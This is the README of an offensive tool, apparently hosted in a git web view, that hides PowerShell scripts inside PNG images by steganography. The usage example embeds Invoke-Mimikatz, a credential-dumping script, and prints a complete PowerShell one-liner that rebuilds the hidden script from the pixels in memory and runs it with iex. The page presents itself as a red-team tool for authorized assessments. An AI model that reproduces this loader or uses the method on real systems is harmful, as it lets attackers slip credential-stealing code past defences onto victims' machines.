blob: 72c28a842a193def7d98f16de7e3ae0c10dedb63 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
|
# go-powerglot
`go-powerglot` is an offensive security utility that embeds PowerShell scripts into PNG images using pixel-level steganography. It transforms ordinary PNG files into covert script carriers and provides a one-liner PowerShell payload for in-memory script extraction and execution. Inspired by [https://github.com/peewpw/Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage)
> **WARNING**: This tool is intended for **authorized security assessments only**. Misuse may violate laws or regulations. The author disclaims any responsibility for unlawful use. Always obtain explicit permission before conducting any security tests.
## Features
- **Steganography**: Embeds PowerShell script bytes into image pixels using RGB channel manipulation.
- **PowerShell Payload Generator**: Automatically generates a one-liner that decodes and executes the script from the PNG image.
- **Portable**: Single binary with no external dependencies beyond Go's standard library.
- **File Size & Dimension Checks**: Ensures the image has sufficient capacity to store the entire script.
## Installation
### Prerequisites
- **Go**: Version 1.21 or later.
- **Make**: For building with the provided Makefile.
- **Git**: To clone the repository.
### Steps
- Clone the repository:
```
$ git clone https://cgit.heqnx.com/go-powerglot
$ cd go-powerglot
```
- Install dependencies:
```
$ go mod tidy
```
- Build for all platforms:
```
$ make all
```
- Binaries will be generated in the build/ directory for Linux, Windows, and macOS; alternatively, build for a specific platform:
```
$ make linux-amd64
$ make windows-amd64
$ make darwin-arm64
```
- (Optional) Run directly with Go:
```
$ go run main.go -exec </path/to/png> -image </path/to/input.png> -out </path/to/out.png> -script </path/to/input.ps1>
```
## Usage
### Command-Line Flags
```
Usage of ./go-powerglot:
-exec string
execution path to be used inside the generated PowerShell one-liner
-image string
input PNG file to embed the script into
-out string
output PNG file with embedded script
-script string
PowerShell script file to embed
```
## Examples
### Embed a PowerShell script into a PNG and generate a decoder:
```
$ ./go-powerglot \
-image img/windows-11-5689x2400.png \
-script Invoke-Mimikatz.ps1 \
-out test.png \
-exec C:\Users\Public\test.png
```
- Example output:
```
[inf] script size: 3625037 bytes
[inf] image size: 2702073 bytes
[inf] png dimensions: 5689x2400
[inf] created output file: /home/heqnx/go-powerglot/test.png
[inf] successfully embedded Invoke-Mimikatz.ps1 into test.png
[inf] powershell decoder snippet:
sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("C:\Users\Public\test.png");$o=a byte[] 13653600;(0..2399)|%{foreach($x in 0..5688) {$p=$g.getpixel($x,$_);$o[$_*5689+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..3625036]))
```
- Use the generated PowerShell snippet to decode and execute the embedded script:
- The PowerShell snippet uses pixel decoding logic to reconstruct the original script in memory and execute it using `iex`.
## Disclaimer
`go-powerglot` is provided "as is" without any warranties. The author and contributors are not responsible for damages or misuse. This tool is for research and authorized red team operations only.
## License
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the [LICENSE](LICENSE) file for more details.
|